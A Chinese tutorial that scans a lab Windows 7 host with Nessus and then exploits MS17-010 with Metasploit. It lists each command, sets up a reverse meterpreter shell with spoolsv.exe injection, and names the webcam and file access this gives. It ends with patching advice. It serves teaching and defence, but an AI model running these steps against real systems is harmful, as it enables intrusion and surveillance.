安全攻防系列2-服务器漏洞安全

Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件,提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。可以配置不同的扫描方案及插件。但在中国网络环境很多网民并没有修补漏洞的习惯,或者使用很多过时的系统或软件,存在较大的安全风险,本文主要介绍kali linux nessus软件的漏洞扫描,并利用windows操作系统的漏洞ms17-010进行攻击演示,本文仅用于个人研究服务器安全,请勿用于非法用途,后果自负。

1、打开win7、kali linux设置NAT网卡在相同的网段192.168.188.0

2、开启nessusd服务,kali控制台输入:service nessusd start

3、使用nessusd进行漏洞扫描:访问https://192.168.188.128:8834

创建扫描window任务并开始扫描

4、通过msf平台利用ms17漏洞

进入msf平台:msfconsole

搜索可利用模块:search ms17

使用指定功能:use exploit/windows/smb/ms17-010

显示参数:show options

设置远程主机:set RHOST 192.168.188.130

显示可攻击对象:show targets

设置攻击对象:set TARGET 8

设置注入进程:set PROCESSINJECT spoolsv.exe

显示payloads:show payloads

设置payload:set PAYLOAD windows/meterpreter_reverse_tcp

设置本地主机:set LHOST 192.168.188.128

开始利用:exploit -j

返回了meterpreter则说明注入成功,可以有很多操作可以使用,例如调命令窗口、访问远程主机文件、系统截屏、打开摄像头。。。。。。

本文需要的资料可访问下面链接获取:

链接:https://pan.baidu.com/s/1Aqv6wCM5HRwL_zGfMUrycw

提取码:l51b

防御办法:

1、定期使用漏洞扫描工具进行安全检查。

2、windows更新虽然体验差,但是高危漏洞还是有必要更新的,关闭系统更新的可以使用360软件来进行补丁更新。

3、在各软件发布漏洞后一定记得及时更新补丁程序,不明来源软件不要随意安装。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181025G0LT7600?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券